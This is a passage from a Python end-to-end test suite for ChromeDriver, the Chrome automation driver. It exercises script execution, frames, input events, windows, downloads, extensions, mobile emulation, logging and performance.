chromedriver.ScriptTimeout,
self._driver.ExecuteAsyncScript,
'var callback = arguments[0];'
'setTimeout(function(){callback(1);}, 10000);')
self.assertEquals(
2,
self._driver.ExecuteAsyncScript(
'var callback = arguments[0];'
'setTimeout(function(){callback(2);}, 300);'))
def testSwitchToFrame(self):
self._driver.ExecuteScript(
'var frame = document.createElement("iframe");'
'frame.id="id";'
'frame.name="name";'
'document.body.appendChild(frame);')
self.assertTrue(self._driver.ExecuteScript('return window.top == window'))
self._driver.SwitchToFrame('id')
self.assertTrue(self._driver.ExecuteScript('return window.top != window'))
self._driver.SwitchToMainFrame()
self.assertTrue(self._driver.ExecuteScript('return window.top == window'))
self._driver.SwitchToFrame('name')
self.assertTrue(self._driver.ExecuteScript('return window.top != window'))
self._driver.SwitchToMainFrame()
self.assertTrue(self._driver.ExecuteScript('return window.top == window'))
self._driver.SwitchToFrameByIndex(0)
self.assertTrue(self._driver.ExecuteScript('return window.top != window'))
self._driver.SwitchToMainFrame()
self.assertTrue(self._driver.ExecuteScript('return window.top == window'))
self._driver.SwitchToFrame(self._driver.FindElement('tag name', 'iframe'))
self.assertTrue(self._driver.ExecuteScript('return window.top != window'))
def testSwitchToParentFrame(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/nested.html'))
self.assertTrue('One' in self._driver.GetPageSource())
self._driver.SwitchToFrameByIndex(0)
self.assertTrue('Two' in self._driver.GetPageSource())
self._driver.SwitchToFrameByIndex(0)
self.assertTrue('Three' in self._driver.GetPageSource())
self._driver.SwitchToParentFrame()
self.assertTrue('Two' in self._driver.GetPageSource())
self._driver.SwitchToParentFrame()
self.assertTrue('One' in self._driver.GetPageSource())
def testExecuteInRemovedFrame(self):
self._driver.ExecuteScript(
'var frame = document.createElement("iframe");'
'frame.id="id";'
'frame.name="name";'
'document.body.appendChild(frame);'
'window.addEventListener("message",'
' function(event) { document.body.removeChild(frame); });')
self.assertTrue(self._driver.ExecuteScript('return window.top == window'))
self._driver.SwitchToFrame('id')
self.assertTrue(self._driver.ExecuteScript('return window.top != window'))
self._driver.ExecuteScript('parent.postMessage("remove", "*");')
self.assertTrue(self._driver.ExecuteScript('return window.top == window'))
def testGetTitle(self):
script = 'document.title = "title"; return 1;'
self.assertEquals(1, self._driver.ExecuteScript(script))
self.assertEquals('title', self._driver.GetTitle())
def testGetPageSource(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/page_test.html'))
self.assertTrue('Link to empty.html' in self._driver.GetPageSource())
def testFindElement(self):
self._driver.ExecuteScript(
'document.body.innerHTML = "<div>a</div><div>b</div>";')
self.assertTrue(
isinstance(self._driver.FindElement('tag name', 'div'), WebElement))
def testFindElements(self):
self._driver.ExecuteScript(
'document.body.innerHTML = "<div>a</div><div>b</div>";')
divs = self._driver.FindElements('tag name', 'div')
self.assertTrue(isinstance(divs, list))
self.assertEquals(2, len(divs))
for div in divs:
self.assertTrue(isinstance(div, WebElement))
def testFindChildElement(self):
self._driver.ExecuteScript(
'document.body.innerHTML = "<div><br><br></div><div><a></a></div>";')
element = self._driver.FindElement('tag name', 'div')
self.assertTrue(
isinstance(element.FindElement('tag name', 'br'), WebElement))
def testFindChildElements(self):
self._driver.ExecuteScript(
'document.body.innerHTML = "<div><br><br></div><div><br></div>";')
element = self._driver.FindElement('tag name', 'div')
brs = element.FindElements('tag name', 'br')
self.assertTrue(isinstance(brs, list))
self.assertEquals(2, len(brs))
for br in brs:
self.assertTrue(isinstance(br, WebElement))
def testHoverOverElement(self):
div = self._driver.ExecuteScript(
'document.body.innerHTML = "<div>old</div>";'
'var div = document.getElementsByTagName("div")[0];'
'div.addEventListener("mouseover", function() {'
' document.body.appendChild(document.createElement("br"));'
'});'
'return div;')
div.HoverOver()
self.assertEquals(1, len(self._driver.FindElements('tag name', 'br')))
def testClickElement(self):
div = self._driver.ExecuteScript(
'document.body.innerHTML = "<div>old</div>";'
'var div = document.getElementsByTagName("div")[0];'
'div.addEventListener("click", function() {'
' div.innerHTML="new<br>";'
'});'
'return div;')
div.Click()
self.assertEquals(1, len(self._driver.FindElements('tag name', 'br')))
def testSingleTapElement(self):
div = self._driver.ExecuteScript(
'document.body.innerHTML = "<div>old</div>";'
'var div = document.getElementsByTagName("div")[0];'
'div.addEventListener("touchend", function() {'
' div.innerHTML="new<br>";'
'});'
'return div;')
div.SingleTap()
self.assertEquals(1, len(self._driver.FindElements('tag name', 'br')))
def testTouchDownUpElement(self):
div = self._driver.ExecuteScript(
'document.body.innerHTML = "<div>old</div>";'
'var div = document.getElementsByTagName("div")[0];'
'div.addEventListener("touchend", function() {'
' div.innerHTML="new<br>";'
'});'
'return div;')
loc = div.GetLocation()
self._driver.TouchDown(loc['x'], loc['y'])
self._driver.TouchUp(loc['x'], loc['y'])
self.assertEquals(1, len(self._driver.FindElements('tag name', 'br')))
def testTouchFlickElement(self):
dx = 3
dy = 4
speed = 5
flickTouchEventsPerSecond = 30
moveEvents = int(
math.sqrt(dx * dx + dy * dy) * flickTouchEventsPerSecond / speed)
div = self._driver.ExecuteScript(
'document.body.innerHTML = "<div>old</div>";'
'var div = document.getElementsByTagName("div")[0];'
'div.addEventListener("touchstart", function() {'
' div.innerHTML = "preMove0";'
'});'
'div.addEventListener("touchmove", function() {'
' res = div.innerHTML.match(/preMove(\d+)/);'
' if (res != null) {'
' div.innerHTML = "preMove" + (parseInt(res[1], 10) + 1);'
' }'
'});'
'div.addEventListener("touchend", function() {'
' if (div.innerHTML == "preMove' + str(moveEvents) + '") {'
' div.innerHTML = "new<br>";'
' }'
'});'
'return div;')
self._driver.TouchFlick(div, dx, dy, speed)
self.assertEquals(1, len(self._driver.FindElements('tag name', 'br')))
def testTouchMovedElement(self):
div = self._driver.ExecuteScript(
'document.body.innerHTML = "<div>old</div>";'
'var div = document.getElementsByTagName("div")[0];'
'div.addEventListener("touchmove", function() {'
' div.innerHTML="new<br>";'
'});'
'return div;')
loc = div.GetLocation()
self._driver.TouchDown(loc['x'], loc['y'])
self._driver.TouchMove(loc['x'] + 1, loc['y'] + 1)
self._driver.TouchUp(loc['x'] + 1, loc['y'] + 1)
self.assertEquals(1, len(self._driver.FindElements('tag name', 'br')))
def testClickElementInSubFrame(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/frame_test.html'))
frame = self._driver.FindElement('tag name', 'iframe')
self._driver.SwitchToFrame(frame)
# Test clicking element in the sub frame.
self.testClickElement()
def testClearElement(self):
text = self._driver.ExecuteScript(
'document.body.innerHTML = \'<input type="text" value="abc">\';'
'var input = document.getElementsByTagName("input")[0];'
'input.addEventListener("change", function() {'
' document.body.appendChild(document.createElement("br"));'
'});'
'return input;')
text.Clear()
self.assertEquals(1, len(self._driver.FindElements('tag name', 'br')))
def testSendKeysToElement(self):
text = self._driver.ExecuteScript(
'document.body.innerHTML = \'<input type="text">\';'
'var input = document.getElementsByTagName("input")[0];'
'input.addEventListener("change", function() {'
' document.body.appendChild(document.createElement("br"));'
'});'
'return input;')
text.SendKeys('0123456789+-*/ Hi')
text.SendKeys(', there!')
value = self._driver.ExecuteScript('return arguments[0].value;', text)
self.assertEquals('0123456789+-*/ Hi, there!', value)
def testGetCurrentUrl(self):
self.assertEquals('data:,', self._driver.GetCurrentUrl())
def testGoBackAndGoForward(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
self._driver.GoBack()
self._driver.GoForward()
def testRefresh(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
self._driver.Refresh()
def testMouseMoveTo(self):
div = self._driver.ExecuteScript(
'document.body.innerHTML = "<div>old</div>";'
'var div = document.getElementsByTagName("div")[0];'
'div.style["width"] = "100px";'
'div.style["height"] = "100px";'
'div.addEventListener("mouseover", function() {'
' var div = document.getElementsByTagName("div")[0];'
' div.innerHTML="new<br>";'
'});'
'return div;')
self._driver.MouseMoveTo(div, 10, 10)
self.assertEquals(1, len(self._driver.FindElements('tag name', 'br')))
def testMouseClick(self):
div = self._driver.ExecuteScript(
'document.body.innerHTML = "<div>old</div>";'
'var div = document.getElementsByTagName("div")[0];'
'div.style["width"] = "100px";'
'div.style["height"] = "100px";'
'div.addEventListener("click", function() {'
' var div = document.getElementsByTagName("div")[0];'
' div.innerHTML="new<br>";'
'});'
'return div;')
self._driver.MouseMoveTo(div)
self._driver.MouseClick()
self.assertEquals(1, len(self._driver.FindElements('tag name', 'br')))
def testMouseButtonDownAndUp(self):
self._driver.ExecuteScript(
'document.body.innerHTML = "<div>old</div>";'
'var div = document.getElementsByTagName("div")[0];'
'div.style["width"] = "100px";'
'div.style["height"] = "100px";'
'div.addEventListener("mousedown", function() {'
' var div = document.getElementsByTagName("div")[0];'
' div.innerHTML="new1<br>";'
'});'
'div.addEventListener("mouseup", function() {'
' var div = document.getElementsByTagName("div")[0];'
' div.innerHTML="new2<a></a>";'
'});')
self._driver.MouseMoveTo(None, 50, 50)
self._driver.MouseButtonDown()
self.assertEquals(1, len(self._driver.FindElements('tag name', 'br')))
self._driver.MouseButtonUp()
self.assertEquals(1, len(self._driver.FindElements('tag name', 'a')))
def testMouseDoubleClick(self):
div = self._driver.ExecuteScript(
'document.body.innerHTML = "<div>old</div>";'
'var div = document.getElementsByTagName("div")[0];'
'div.style["width"] = "100px";'
'div.style["height"] = "100px";'
'div.addEventListener("dblclick", function() {'
' var div = document.getElementsByTagName("div")[0];'
' div.innerHTML="new<br>";'
'});'
'return div;')
self._driver.MouseMoveTo(div, 1, 1)
self._driver.MouseDoubleClick()
self.assertEquals(1, len(self._driver.FindElements('tag name', 'br')))
def testAlert(self):
self.assertFalse(self._driver.IsAlertOpen())
self._driver.ExecuteScript(
'window.setTimeout('
' function() { window.confirmed = confirm(\'HI\'); },'
' 0);')
self.assertTrue(self._driver.IsAlertOpen())
self.assertEquals('HI', self._driver.GetAlertMessage())
self._driver.HandleAlert(False)
self.assertFalse(self._driver.IsAlertOpen())
self.assertEquals(False,
self._driver.ExecuteScript('return window.confirmed'))
def testShouldHandleNewWindowLoadingProperly(self):
"""Tests that ChromeDriver determines loading correctly for new windows."""
self._http_server.SetDataForPath(
'/newwindow',
"""
<html>
<body>
<a href='%s' target='_blank'>new window/tab</a>
</body>
</html>""" % self._sync_server.GetUrl())
self._driver.Load(self._http_server.GetUrl() + '/newwindow')
old_windows = self._driver.GetWindowHandles()
self._driver.FindElement('tagName', 'a').Click()
new_window = self._WaitForNewWindow(old_windows)
self.assertNotEqual(None, new_window)
self.assertFalse(self._driver.IsLoading())
self._driver.SwitchToWindow(new_window)
self.assertTrue(self._driver.IsLoading())
self._sync_server.RespondWithContent('<html>new window</html>')
self._driver.ExecuteScript('return 1') # Shouldn't hang.
def testPopups(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
old_handles = self._driver.GetWindowHandles()
self._driver.ExecuteScript('window.open("about:blank")')
new_window_handle = self._WaitForNewWindow(old_handles)
self.assertNotEqual(None, new_window_handle)
def testNoSuchFrame(self):
self.assertRaises(chromedriver.NoSuchFrame,
self._driver.SwitchToFrame, 'nosuchframe')
self.assertRaises(chromedriver.NoSuchFrame,
self._driver.SwitchToFrame,
self._driver.FindElement('tagName', 'body'))
def testWindowPosition(self):
position = self._driver.GetWindowPosition()
self._driver.SetWindowPosition(position[0], position[1])
self.assertEquals(position, self._driver.GetWindowPosition())
# Resize so the window isn't moved offscreen.
# See https://code.google.com/p/chromedriver/issues/detail?id=297.
self._driver.SetWindowSize(300, 300)
self._driver.SetWindowPosition(100, 200)
self.assertEquals([100, 200], self._driver.GetWindowPosition())
def testWindowSize(self):
size = self._driver.GetWindowSize()
self._driver.SetWindowSize(size[0], size[1])
self.assertEquals(size, self._driver.GetWindowSize())
self._driver.SetWindowSize(600, 400)
self.assertEquals([600, 400], self._driver.GetWindowSize())
def testWindowMaximize(self):
self._driver.SetWindowPosition(100, 200)
self._driver.SetWindowSize(600, 400)
self._driver.MaximizeWindow()
self.assertNotEqual([100, 200], self._driver.GetWindowPosition())
self.assertNotEqual([600, 400], self._driver.GetWindowSize())
# Set size first so that the window isn't moved offscreen.
# See https://code.google.com/p/chromedriver/issues/detail?id=297.
self._driver.SetWindowSize(600, 400)
self._driver.SetWindowPosition(100, 200)
self.assertEquals([100, 200], self._driver.GetWindowPosition())
self.assertEquals([600, 400], self._driver.GetWindowSize())
def testConsoleLogSources(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/console_log.html'))
logs = self._driver.GetLog('browser')
self.assertEquals(len(logs), 2)
self.assertEquals(logs[0]['source'], 'network')
self.assertEquals(logs[1]['source'], 'javascript')
def testAutoReporting(self):
self.assertFalse(self._driver.IsAutoReporting())
self._driver.SetAutoReporting(True)
self.assertTrue(self._driver.IsAutoReporting())
url = self.GetHttpUrlForFile('/chromedriver/console_log.html')
self.assertRaisesRegexp(chromedriver.UnknownError,
'.*(404|Failed to load resource).*',
self._driver.Load,
url)
def testContextMenuEventFired(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/context_menu.html'))
self._driver.MouseMoveTo(self._driver.FindElement('tagName', 'div'))
self._driver.MouseClick(2)
self.assertTrue(self._driver.ExecuteScript('return success'))
def testHasFocusOnStartup(self):
# Some pages (about:blank) cause Chrome to put the focus in URL bar.
# This breaks tests depending on focus.
self.assertTrue(self._driver.ExecuteScript('return document.hasFocus()'))
def testTabCrash(self):
# If a tab is crashed, the session will be deleted.
# When 31 is released, will reload the tab instead.
# https://code.google.com/p/chromedriver/issues/detail?id=547
self.assertRaises(chromedriver.UnknownError,
self._driver.Load, 'chrome://crash')
self.assertRaises(chromedriver.NoSuchSession,
self._driver.GetCurrentUrl)
def testDoesntHangOnDebugger(self):
self._driver.ExecuteScript('debugger;')
def testMobileEmulationDisabledByDefault(self):
self.assertFalse(self._driver.capabilities['mobileEmulationEnabled'])
def testChromeDriverSendLargeData(self):
script = 's = ""; for (i = 0; i < 10e6; i++) s += "0"; return s;'
lots_of_data = self._driver.ExecuteScript(script)
self.assertEquals('0'.zfill(int(10e6)), lots_of_data)
def testChromeDriverReceiveAndSendLargeData(self):
lots_of_data = '1'.zfill(int(10e6))
result = self._driver.ExecuteScript('return "%s"' % lots_of_data)
self.assertEquals(lots_of_data, result)
class ChromeDriverAndroidTest(ChromeDriverBaseTest):
"""End to end tests for Android-specific tests."""
def testLatestAndroidAppInstalled(self):
if ('stable' not in _ANDROID_PACKAGE_KEY and
'beta' not in _ANDROID_PACKAGE_KEY):
return
self._driver = self.CreateDriver()
try:
omaha_list = json.loads(
urllib2.urlopen('http://omahaproxy.appspot.com/all.json').read())
for l in omaha_list:
if l['os'] != 'android':
continue
for v in l['versions']:
if (('stable' in v['channel'] and 'stable' in _ANDROID_PACKAGE_KEY) or
('beta' in v['channel'] and 'beta' in _ANDROID_PACKAGE_KEY)):
omaha = map(int, v['version'].split('.'))
device = map(int, self._driver.capabilities['version'].split('.'))
self.assertTrue(omaha <= device)
return
raise RuntimeError('Malformed omaha JSON')
except urllib2.URLError as e:
print 'Unable to fetch current version info from omahaproxy (%s)' % e
def testDeviceManagement(self):
self._drivers = [self.CreateDriver() for x in
android_commands.GetAttachedDevices()]
self.assertRaises(chromedriver.UnknownError, self.CreateDriver)
self._drivers[0].Quit()
self._drivers[0] = self.CreateDriver()
class ChromeDownloadDirTest(ChromeDriverBaseTest):
def __init__(self, *args, **kwargs):
super(ChromeDownloadDirTest, self).__init__(*args, **kwargs)
self._temp_dirs = []
def CreateTempDir(self):
temp_dir = tempfile.mkdtemp()
self._temp_dirs.append(temp_dir)
return temp_dir
def tearDown(self):
# Call the superclass tearDown() method before deleting temp dirs, so that
# Chrome has a chance to exit before its user data dir is blown away from
# underneath it.
super(ChromeDownloadDirTest, self).tearDown()
for temp_dir in self._temp_dirs:
shutil.rmtree(temp_dir)
def testFileDownload(self):
download_dir = self.CreateTempDir()
download_name = os.path.join(download_dir, 'a_red_dot.png')
driver = self.CreateDriver(download_dir=download_dir)
driver.Load(ChromeDriverTest.GetHttpUrlForFile(
'/chromedriver/download.html'))
driver.FindElement('id', 'red-dot').Click()
deadline = time.time() + 60
while True:
time.sleep(0.1)
if os.path.isfile(download_name) or time.time() > deadline:
break
self.assertTrue(os.path.isfile(download_name), "Failed to download file!")
def testDownloadDirectoryOverridesExistingPreferences(self):
user_data_dir = self.CreateTempDir()
download_dir = self.CreateTempDir()
sub_dir = os.path.join(user_data_dir, 'Default')
os.mkdir(sub_dir)
prefs_file_path = os.path.join(sub_dir, 'Preferences')
prefs = {
'test': 'this should not be changed',
'download': {
'default_directory': '/old/download/directory'
}
}
with open(prefs_file_path, 'w') as f:
json.dump(prefs, f)
driver = self.CreateDriver(
chrome_switches=['user-data-dir=' + user_data_dir],
download_dir=download_dir)
with open(prefs_file_path) as f:
prefs = json.load(f)
self.assertEqual('this should not be changed', prefs['test'])
download = prefs['download']
self.assertEqual(download['default_directory'], download_dir)
class ChromeSwitchesCapabilityTest(ChromeDriverBaseTest):
"""Tests that chromedriver properly processes chromeOptions.args capabilities.
Makes sure the switches are passed to Chrome.
"""
def testSwitchWithoutArgument(self):
"""Tests that switch --dom-automation can be passed to Chrome.
Unless --dom-automation is specified, window.domAutomationController
is undefined.
"""
driver = self.CreateDriver(chrome_switches=['dom-automation'])
self.assertNotEqual(
None,
driver.ExecuteScript('return window.domAutomationController'))
class ChromeExtensionsCapabilityTest(ChromeDriverBaseTest):
"""Tests that chromedriver properly processes chromeOptions.extensions."""
def _PackExtension(self, ext_path):
return base64.b64encode(open(ext_path, 'rb').read())
def testExtensionsInstall(self):
"""Checks that chromedriver can take the extensions in crx format."""
crx_1 = os.path.join(_TEST_DATA_DIR, 'ext_test_1.crx')
crx_2 = os.path.join(_TEST_DATA_DIR, 'ext_test_2.crx')
self.CreateDriver(chrome_extensions=[self._PackExtension(crx_1),
self._PackExtension(crx_2)])
def testExtensionsInstallZip(self):
"""Checks that chromedriver can take the extensions in zip format."""
zip_1 = os.path.join(_TEST_DATA_DIR, 'ext_test_1.zip')
self.CreateDriver(chrome_extensions=[self._PackExtension(zip_1)])
def testWaitsForExtensionToLoad(self):
did_load_event = threading.Event()
server = webserver.SyncWebServer()
def RunServer():
time.sleep(5)
server.RespondWithContent('<html>iframe</html>')
did_load_event.set()
thread = threading.Thread(target=RunServer)
thread.daemon = True
thread.start()
crx = os.path.join(_TEST_DATA_DIR, 'ext_slow_loader.crx')
driver = self.CreateDriver(
chrome_switches=['user-agent=' + server.GetUrl()],
chrome_extensions=[self._PackExtension(crx)])
self.assertTrue(did_load_event.is_set())
class ChromeLogPathCapabilityTest(ChromeDriverBaseTest):
"""Tests that chromedriver properly processes chromeOptions.logPath."""
LOG_MESSAGE = 'Welcome to ChromeLogPathCapabilityTest!'
def testChromeLogPath(self):
"""Checks that user can specify the path of the chrome log.
Verifies that a log message is written into the specified log file.
"""
tmp_log_path = tempfile.NamedTemporaryFile()
driver = self.CreateDriver(chrome_log_path=tmp_log_path.name)
driver.ExecuteScript('console.info("%s")' % self.LOG_MESSAGE)
driver.Quit()
self.assertTrue(self.LOG_MESSAGE in open(tmp_log_path.name).read())
class MobileEmulationCapabilityTest(ChromeDriverBaseTest):
"""Tests that ChromeDriver processes chromeOptions.mobileEmulation.
Makes sure the device metrics are overridden in DevTools and user agent is
overridden in Chrome.
"""
@staticmethod
def GlobalSetUp():
def respondWithUserAgentString(request):
return """
<html>
<body>%s</body>
</html>""" % request.GetHeader('User-Agent')
def respondWithUserAgentStringUseDeviceWidth(request):
return """
<html>
<head>
<meta name="viewport" content="width=device-width,minimum-scale=1.0">
</head>
<body>%s</body>
</html>""" % request.GetHeader('User-Agent')
MobileEmulationCapabilityTest._http_server = webserver.WebServer(
chrome_paths.GetTestData())
MobileEmulationCapabilityTest._http_server.SetCallbackForPath(
'/userAgent', respondWithUserAgentString)
MobileEmulationCapabilityTest._http_server.SetCallbackForPath(
'/userAgentUseDeviceWidth', respondWithUserAgentStringUseDeviceWidth)
@staticmethod
def GlobalTearDown():
MobileEmulationCapabilityTest._http_server.Shutdown()
def testDeviceMetricsWithStandardWidth(self):
driver = self.CreateDriver(
mobile_emulation = {
'deviceMetrics': {'width': 360, 'height': 640, 'pixelRatio': 3},
'userAgent': 'Mozilla/5.0 (Linux; Android 4.2.1; en-us; Nexus 5 Bui'
'ld/JOP40D) AppleWebKit/535.19 (KHTML, like Gecko) Chr'
'ome/18.0.1025.166 Mobile Safari/535.19'
})
driver.SetWindowSize(600, 400)
driver.Load(self._http_server.GetUrl() + '/userAgent')
self.assertTrue(driver.capabilities['mobileEmulationEnabled'])
self.assertEqual(360, driver.ExecuteScript('return window.screen.width'))
self.assertEqual(640, driver.ExecuteScript('return window.screen.height'))
def testDeviceMetricsWithDeviceWidth(self):
driver = self.CreateDriver(
mobile_emulation = {
'deviceMetrics': {'width': 360, 'height': 640, 'pixelRatio': 3},
'userAgent': 'Mozilla/5.0 (Linux; Android 4.2.1; en-us; Nexus 5 Bui'
'ld/JOP40D) AppleWebKit/535.19 (KHTML, like Gecko) Chr'
'ome/18.0.1025.166 Mobile Safari/535.19'
})
driver.Load(self._http_server.GetUrl() + '/userAgentUseDeviceWidth')
self.assertTrue(driver.capabilities['mobileEmulationEnabled'])
self.assertEqual(360, driver.ExecuteScript('return window.screen.width'))
self.assertEqual(640, driver.ExecuteScript('return window.screen.height'))
def testUserAgent(self):
driver = self.CreateDriver(
mobile_emulation = {'userAgent': 'Agent Smith'})
driver.Load(self._http_server.GetUrl() + '/userAgent')
body_tag = driver.FindElement('tag name', 'body')
self.assertEqual("Agent Smith", body_tag.GetText())
def testDeviceName(self):
driver = self.CreateDriver(
mobile_emulation = {'deviceName': 'Google Nexus 5'})
driver.Load(self._http_server.GetUrl() + '/userAgentUseDeviceWidth')
self.assertEqual(360, driver.ExecuteScript('return window.screen.width'))
self.assertEqual(640, driver.ExecuteScript('return window.screen.height'))
body_tag = driver.FindElement('tag name', 'body')
self.assertEqual(
'Mozilla/5.0 (Linux; Android 4.2.1; en-us; Nexus 5 Build/JOP40D) AppleW'
'ebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.166 Mobile Safari/53'
'5.19',
body_tag.GetText())
def testSendKeysToElement(self):
driver = self.CreateDriver(
mobile_emulation = {'deviceName': 'Google Nexus 5'})
text = driver.ExecuteScript(
'document.body.innerHTML = \'<input type="text">\';'
'var input = document.getElementsByTagName("input")[0];'
'input.addEventListener("change", function() {'
' document.body.appendChild(document.createElement("br"));'
'});'
'return input;')
text.SendKeys('0123456789+-*/ Hi')
text.SendKeys(', there!')
value = driver.ExecuteScript('return arguments[0].value;', text)
self.assertEquals('0123456789+-*/ Hi, there!', value)
def testHoverOverElement(self):
driver = self.CreateDriver(
mobile_emulation = {'deviceName': 'Google Nexus 5'})
driver.Load('about:blank')
div = driver.ExecuteScript(
'document.body.innerHTML = "<div>old</div>";'
'var div = document.getElementsByTagName("div")[0];'
'div.addEventListener("mouseover", function() {'
' document.body.appendChild(document.createElement("br"));'
'});'
'return div;')
div.HoverOver()
self.assertEquals(1, len(driver.FindElements('tag name', 'br')))
def testClickElement(self):
driver = self.CreateDriver(
mobile_emulation = {'deviceName': 'Google Nexus 5'})
driver.Load('about:blank')
div = driver.ExecuteScript(
'document.body.innerHTML = "<div>old</div>";'
'var div = document.getElementsByTagName("div")[0];'
'div.addEventListener("click", function() {'
' div.innerHTML="new<br>";'
'});'
'return div;')
div.Click()
self.assertEquals(1, len(driver.FindElements('tag name', 'br')))
def testSingleTapElement(self):
driver = self.CreateDriver(
mobile_emulation = {'deviceName': 'Google Nexus 5'})
driver.Load('about:blank')
div = driver.ExecuteScript(
'document.body.innerHTML = "<div>old</div>";'
'var div = document.getElementsByTagName("div")[0];'
'div.addEventListener("touchend", function() {'
' div.innerHTML="new<br>";'
'});'
'return div;')
div.SingleTap()
self.assertEquals(1, len(driver.FindElements('tag name', 'br')))
def testTouchDownUpElement(self):
driver = self.CreateDriver(
mobile_emulation = {'deviceName': 'Google Nexus 5'})
div = driver.ExecuteScript(
'document.body.innerHTML = "<div>old</div>";'
'var div = document.getElementsByTagName("div")[0];'
'div.addEventListener("touchend", function() {'
' div.innerHTML="new<br>";'
'});'
'return div;')
loc = div.GetLocation()
driver.TouchDown(loc['x'], loc['y'])
driver.TouchUp(loc['x'], loc['y'])
self.assertEquals(1, len(driver.FindElements('tag name', 'br')))
class ChromeDriverLogTest(unittest.TestCase):
"""Tests that chromedriver produces the expected log file."""
UNEXPECTED_CHROMEOPTION_CAP = 'unexpected_chromeoption_capability'
LOG_MESSAGE = 'unrecognized chrome option: %s' % UNEXPECTED_CHROMEOPTION_CAP
def testChromeDriverLog(self):
_, tmp_log_path = tempfile.mkstemp(prefix='chromedriver_log_')
chromedriver_server = server.Server(
_CHROMEDRIVER_BINARY, log_path=tmp_log_path)
try:
driver = chromedriver.ChromeDriver(
chromedriver_server.GetUrl(), chrome_binary=_CHROME_BINARY,
experimental_options={ self.UNEXPECTED_CHROMEOPTION_CAP : 1 })
driver.Quit()
except chromedriver.ChromeDriverException, e:
self.assertTrue(self.LOG_MESSAGE in e.message)
finally:
chromedriver_server.Kill()
with open(tmp_log_path, 'r') as f:
self.assertTrue(self.LOG_MESSAGE in f.read())
class PerformanceLoggerTest(ChromeDriverBaseTest):
"""Tests chromedriver tracing support and Inspector event collection."""
def testPerformanceLogger(self):
driver = self.CreateDriver(
experimental_options={'perfLoggingPrefs': {
'enableTimeline': True,
'traceCategories': 'webkit.console,blink.console'
}}, performance_log_level='ALL')
driver.Load(
ChromeDriverTest._http_server.GetUrl() + '/chromedriver/empty.html')
# Mark the timeline; later we will verify the marks appear in the trace.
driver.ExecuteScript('console.time("foobar")')
driver.ExecuteScript('console.timeEnd("foobar")')
logs = driver.GetLog('performance')
driver.Quit()
marked_timeline_events = []
seen_log_domains = {}
for entry in logs:
devtools_message = json.loads(entry['message'])['message']
method = devtools_message['method']
domain = method[:method.find('.')]
seen_log_domains[domain] = True
if method != 'Tracing.dataCollected':
continue
self.assertTrue('params' in devtools_message)
self.assertTrue(isinstance(devtools_message['params'], dict))
cat = devtools_message['params'].get('cat', '')
# Depending on Chrome version, the events may occur for the webkit.console
# or blink.console category. They will only occur for one of them.
if (cat == 'blink.console' or cat == 'webkit.console'):
self.assertTrue(devtools_message['params']['name'] == 'foobar')
marked_timeline_events.append(devtools_message)
self.assertEquals(2, len(marked_timeline_events))
self.assertEquals({'Network', 'Page', 'Timeline', 'Tracing'},
set(seen_log_domains.keys()))
class SessionHandlingTest(ChromeDriverBaseTest):
"""Tests for session operations."""
def testQuitASessionMoreThanOnce(self):
driver = self.CreateDriver()
driver.Quit()
driver.Quit()
class RemoteBrowserTest(ChromeDriverBaseTest):
"""Tests for ChromeDriver remote browser capability."""
def setUp(self):
self.assertTrue(_CHROME_BINARY is not None,
'must supply a chrome binary arg')
def testConnectToRemoteBrowser(self):
port = self.FindFreePort()
temp_dir = util.MakeTempDir()
process = subprocess.Popen([_CHROME_BINARY,
'--remote-debugging-port=%d' % port,
'--user-data-dir=%s' % temp_dir])
if process is None:
raise RuntimeError('Chrome could not be started with debugging port')
try:
driver = self.CreateDriver(debugger_address='127.0.0.1:%d' % port)
driver.ExecuteScript('console.info("%s")' % 'connecting at %d!' % port)
driver.Quit()
finally:
process.terminate()
def FindFreePort(self):
for port in range(10000, 10100):
try:
socket.create_connection(('127.0.0.1', port), 0.2).close()
except socket.error:
return port
raise RuntimeError('Cannot find open port')
class PerfTest(ChromeDriverBaseTest):
"""Tests for ChromeDriver perf."""
def setUp(self):
self.assertTrue(_REFERENCE_CHROMEDRIVER is not None,
'must supply a reference-chromedriver arg')
def _RunDriverPerfTest(self, name, test_func):
"""Runs a perf test comparing a reference and new ChromeDriver server.
Args:
name: The name of the perf test.
test_func: Called with the server url to perform the test action. Must
return the time elapsed.
"""
class Results(object):
ref = []
new = []
ref_server = server.Server(_REFERENCE_CHROMEDRIVER)
results = Results()
result_url_pairs = zip([results.new, results.ref],
[_CHROMEDRIVER_SERVER_URL, ref_server.GetUrl()])
for iteration in range(30):
for result, url in result_url_pairs:
result += [test_func(url)]
# Reverse the order for the next run.
result_url_pairs = result_url_pairs[::-1]
def PrintResult(build, result):
mean = sum(result) / len(result)
avg_dev = sum([abs(sample - mean) for sample in result]) / len(result)
print 'perf result', build, name, mean, avg_dev, result
util.AddBuildStepText('%s %s: %.3f+-%.3f' % (
build, name, mean, avg_dev))
# Discard first result, which may be off due to cold start.
PrintResult('new', results.new[1:])
PrintResult('ref', results.ref[1:])
def testSessionStartTime(self):
def Run(url):
start = time.time()
driver = self.CreateDriver(url)
end = time.time()
driver.Quit()
return end - start
self._RunDriverPerfTest('session start', Run)
def testSessionStopTime(self):
def Run(url):
driver = self.CreateDriver(url)
start = time.time()
driver.Quit()
end = time.time()
return end - start
self._RunDriverPerfTest('session stop', Run)
def testColdExecuteScript(self):
def Run(url):
driver = self.CreateDriver(url)
start = time.time()
driver.ExecuteScript('return 1')
end = time.time()
driver.Quit()
return end - start
self._RunDriverPerfTest('cold exe js', Run)
if __name__ == '__main__':
parser = optparse.OptionParser()
parser.add_option(
'', '--chromedriver',
help='Path to chromedriver server (REQUIRED!)')
parser.add_option(
'', '--log-path',
help='Output verbose server logs to this file')
parser.add_option(
'', '--reference-chromedriver',
help='Path to the reference chromedriver server')
parser.add_option(
'', '--chrome', help='Path to a build of the chrome binary')
parser.add_option(
'', '--chrome-version', default='HEAD',
help='Version of chrome. Default is \'HEAD\'.')
parser.add_option(
'', '--filter', type='string', default='*',
help=('Filter for specifying what tests to run, "*" will run all. E.g., '
'*testStartStop'))
parser.add_option(
'', '--android-package',
